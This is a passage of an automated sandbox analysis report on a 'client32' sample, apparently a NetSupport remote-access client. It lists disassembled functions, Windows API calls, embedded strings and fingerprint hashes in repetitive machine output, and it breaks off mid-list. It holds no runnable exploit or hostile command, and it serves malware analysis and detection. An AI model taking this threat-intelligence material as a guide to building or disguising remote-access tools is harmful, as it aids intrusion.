                                                                                • SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
                                                                                • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
                                                                                • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
                                                                                • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 414154005-0
                                                                                • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                                • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
                                                                                Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 111715AE
                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                • __amsg_exit.LIBCMT ref: 111715CE
                                                                                • __lock.LIBCMT ref: 111715DE
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                                • _free.LIBCMT ref: 1117160E
                                                                                • InterlockedIncrement.KERNEL32(012F16D0), ref: 11171626
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 3470314060-0
                                                                                • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                                • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                                Function 110B3560 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                                • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                                • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$EventObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2857295742-0
                                                                                • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                                • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                                Function 11095990 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                • GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                • GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                • GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                • GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-0
                                                                                • Opcode ID: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                • Instruction ID: b65ab4a361e5326c91c4d36ade1d631f08c7cf5d252a1eb012e320adc1ee70d1
                                                                                • Opcode Fuzzy Hash: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                • Instruction Fuzzy Hash: 01F030B1B4131A6BE7009FAADC41B55BB98EB48664F008037A71C87680D6B5A8108FE4
                                                                                Function 1103B606 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                  • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                                • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                                • API String ID: 2477883239-2305317391
                                                                                • Opcode ID: 20d55293dd5fa1f4e889e7781169e96fca4c20f63d10528dafaeeb9acde81bac
                                                                                • Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
                                                                                • Opcode Fuzzy Hash: 20d55293dd5fa1f4e889e7781169e96fca4c20f63d10528dafaeeb9acde81bac
                                                                                • Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50
                                                                                Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                  • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                • EqualRect.USER32(?,?), ref: 1107740C
                                                                                • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                                Strings
                                                                                • m_hWnd, xrefs: 11077447
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$DeferEqualPointsRect
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2754115966-2830328467
                                                                                • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                                • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                Function 11049690 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 1104971C
                                                                                • _free.LIBCMT ref: 11049779
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                                • CLTCONN.CPP, xrefs: 11049708
                                                                                • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
                                                                                • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                                • API String ID: 3300666597-3188990991
                                                                                • Opcode ID: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
                                                                                • Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
                                                                                • Opcode Fuzzy Hash: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
                                                                                • Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95
                                                                                Function 1109DB40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91windowthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageA.USER32(11027105,752BF08B,68575608,11199F9C), ref: 1109DBB6
                                                                                • SendMessageA.USER32(00000000,752BF08B,68575608,11199F9C), ref: 1109DBEF
                                                                                  • Part of subcall function 1109DA70: IsWindow.USER32(?), ref: 1109DA8F
                                                                                  • Part of subcall function 1109DA70: GetClassNameA.USER32(?,?,00000040), ref: 1109DAA0
                                                                                  • Part of subcall function 1109DA70: FindWindowA.USER32(?,00000000), ref: 1109DAE1
                                                                                  • Part of subcall function 1109DA70: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109ED09,000001F4,00000006,?,11067720,0000048C,00000001), ref: 1109DAFC
                                                                                  • Part of subcall function 1109DA70: FindWindowA.USER32(?,00000000), ref: 1109DB0D
                                                                                • PostMessageA.USER32(00000000,752BF08B,68575608,11199F9C), ref: 1109DC0B
                                                                                Strings
                                                                                • ..\CTL32\ipc.cpp, xrefs: 1109DB8D
                                                                                • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 1109DB92
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageWindow$FindPost$ClassNameSendSleepThread
                                                                                • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                • API String ID: 3524374798-1411620790
                                                                                • Opcode ID: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
                                                                                • Instruction ID: f7862f93581c5bca8d7b47be27161d917c1b37376ee9b6c345dd63ee61fb1edc
                                                                                • Opcode Fuzzy Hash: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
                                                                                • Instruction Fuzzy Hash: 0121737574060AEFD314CF59D990D6BF3E9FB88324B10852AE55A87A40D730FC50DB50
                                                                                Function 11033B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strncpy$wsprintf
                                                                                • String ID: %s (%s)
                                                                                • API String ID: 2895084632-1363028141
                                                                                • Opcode ID: 0030f36de6e69c1df68aa0c742c56456b93de146cc6c778061a393736ab38830
                                                                                • Instruction ID: 0ad2666efbab1ef8cbc868768b6c2378956e4de7a80f96389552179b7afbf64e
                                                                                • Opcode Fuzzy Hash: 0030f36de6e69c1df68aa0c742c56456b93de146cc6c778061a393736ab38830
                                                                                • Instruction Fuzzy Hash: D731AF76900B02AFC324DF65C890EA3B7A9FF88318B04455DE64A8BE40E775F464CB90
                                                                                Function 111438D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 111438FE
                                                                                • _memmove.LIBCMT ref: 1114394D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
